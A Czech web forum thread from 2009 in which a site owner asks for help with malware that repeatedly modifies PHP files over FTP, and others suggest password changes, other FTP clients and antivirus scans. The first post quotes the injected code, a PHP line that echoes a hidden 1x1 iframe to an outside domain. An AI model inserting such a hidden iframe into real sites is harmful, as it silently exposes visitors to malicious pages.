Autor | Zpráva | ||
---|---|---|---|
Ghosting Profil |
#1 · Zasláno: 21. 4. 2009, 16:47:44
Zdravím
mám trochu větší problém s jakýmsi červem. Mění mi soubory na FTP, (většinou index.php a jazykové soubory, bohudík jen ty), infikované soubory jsem změnil/opravil, hesla do FTP taktéž. Problém je v tom že se problém objevuje znovu. Hesla si neukládám nikam do PC, z toho jsem se poučil, škodlivý kód se vkládá na konci PHP kódu před ?> Většinou toto echo "<iframe src=\"http://xtrarobotz.com/?click=12028DC\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; PC jsem prohledal antivirem (Avast), nainstaloval Keyholder ale jak je vidmo, něják to nepomáhá. Ptám se tedy, má někdo s tímto druhem viru zkušenosti, stalo se to někomu? |
||
Jan Tvrdík Profil |
#2 · Zasláno: 21. 4. 2009, 17:06:33
Ghosting:
Zkušenosti nemám, ale zkus 1. heslo znovu změnit 2. změnit FTP klienta za jiného |
||
armin Profil |
#3 · Zasláno: 21. 4. 2009, 18:45:52
Ghosting: Ahoj, prubni si projet PC comodo antivirem, je zdarma i pro komerční účely. Pokud vím, tak nod32 a podobná "elita" zatím není schopna tento vir odhalit - alespoň já řešil minulý týden x "stížností" v podobě modifikaci souborů na ftp, přičemž poškozené strany měli řádně zakoupený antivirus (a zcela zbytečně, jak už to tak bývá...) a PC "měli čistý". Jinak aby to nevyznělo divně, jedná se o globální problém, co znám kolegy a známé, týče se to všech hostingů.
|
||
Ghosting Profil |
#4 · Zasláno: 21. 4. 2009, 19:04:35
armin
Díky za link. Určo zkusím. Mě přišel taky email od Gigahostingu, kde doporučovali jiný klient než TC, asi to bude lítat i jinde. |
||
nightfish Profil |
#5 · Zasláno: 21. 4. 2009, 19:25:28
btw Total Commaner ve včera vydané betaverzi podporuje "lepší" šifrování (AES) hesel k FTP
|
||
armin Profil |
#6 · Zasláno: 21. 4. 2009, 21:38:04 · Upravil/a: armin
Ghosting: Bohužel u Total Commandru se moc neřešila bezpečnost co se týče FTP přístupů, nicméně, tak jak praví kolega nightfish - od verze 7.50 je již možné řadit FTP účty do skupin a pro každou skupinu si zvolit "vlastní heslo", tedy nebude to již jak na dlani. Bohužel se k takovýmto krokům přistoupilo podle mě hodně pozdě. Více info zde:
http://cdr.cz/a/26853 // edit Osobně bych nedoporučoval zkoušet betu, raději počkat týden dva a upgradnout na finální verzi. |
||
Ghosting Profil |
#7 · Zasláno: 22. 4. 2009, 17:18:53
Hesla už raději neukládám. :)
Spíše nechápu proč se ten kód tam vkládá, co tím autor sleduje? |
||
Časová prodleva: 15 let
|
0